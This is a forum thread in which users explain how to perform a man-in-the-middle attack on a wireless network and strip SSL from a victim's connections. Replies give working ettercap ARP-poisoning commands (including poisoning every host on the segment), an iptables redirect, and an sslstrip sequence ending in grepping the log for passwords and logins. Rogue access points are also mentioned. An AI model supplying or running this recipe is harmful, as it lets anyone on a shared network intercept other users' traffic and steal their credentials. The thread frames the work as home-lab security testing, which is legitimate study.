not sure if you can do it on wlan protos
Howto MITM in a WLAN?
hi there,
following scenario:
my homenetwork ->
- wlan router (speedport 701)
- eee 1000h (victim running WinXP, connected via wlan)
- eee 1000h (attacker running BT4 or ubuntu 9.04, connected via wlan)
If I connect the eee's with a wire to the router I can arpspoof the victim and the strip the ssl connection.
But how do I do that in a wlan network.
If i arpspoof the wlan victim it's cut of the network...
II think it's because the victim thinks that i am the accesspoint and not only the router.
So how can i strip the ssl in a wlan connection?
Edit:
If I connect the the vixtim and the attacker via cable it works...
So it's not my dumbness!
Edit2:
Ok i thought about my thread and the problem is not how to sslstrip.
The problem is how to do a MITM in a wlan!
not sure if you can do it on wlan protos
Check this out....Originally Posted by hardez
Rogue Accesspoint + MitM Sniffing tutorial
Code:http://forums.remote-exploit.org/showthread.php?t=19048
Guessing you are having problems with arpspoof. It is kind of picky on what cards you have. Use ettercap.
ettercap -T -q -i wlan0 -M arp /victum ip ie 192.169.0.101/ //
-T is for just text -q is for quit -i is your interphase -M is MITM arp is to arp em! If you don't know what the target ip is then nail em all.
ettercap -T -q -i wlan0 -M arp // //
Don't do this on a network with a zillion people on it.
Not sure what card you have but you said wlan so I guess you have a Alfa or something like that.
Let me explain officer, I am not a hacker. I am a security tester of sorts!
To my knowledge, arpspoof is broken with reference to the network interface option. A patched version can be found HERE. I know this version of arpspoof will work fine over wireless for MITM.
If you don't feel like down loading the patched version of arpspoof that cypersnpr talks about this is an other way of doing what you want. The patched arpspoof works well.
onryo# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# python ./sslstrip.py -p -f -l 8080 (-p only SSL POST, -f favicon)
# ettercap -T -q -i wlan0 -M arp /target IP/ // ( /666.666.666.666/ // )
# cat sslstrip.log | grep (ie pw, pass, login etc)
Let me explain officer, I am not a hacker. I am a security tester of sorts!
Ok tryed it with ettercap, worked fine, BUT...
As I started sslstrip all connections to http sites were blocked!
https sites works.
i tryed it with
and withCode:sslstrip -f -k -l 8080
but nothing works.Code:sslstrip -p -f -l 8080
If I stop sslstrip the connection works.
Ideas?
EDIT:
This is done under ubuntu 9.04 didn't tryed with BT4
But in my opinion it should work there too...
EDIT2:
Just tryed it in BT4 and it works...
But WHY?!
Why does it works in BT and not in Ubuntu 9.04?
even with the patched version of arpspoof i still had probs.
ettercap is much better to use, and worked like a charm.
hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.
think duel FON
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
I've had the same type issue with metasploit...it worked fine in BT, but not so well on Sidux. Really makes you appreciate the dev's.even with the patched version of arpspoof i still had probs.
ettercap is much better to use, and worked like a charm.
hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.
think duel FON
"You can get more with a kind word and a gun than you can with a kind word alone."
- Al Capone
hallelujah!
I prepared everything in my last war games and then arpspoof (the easiest part) didn't work. It was awful
Auswaertsspiel
Posting Permissions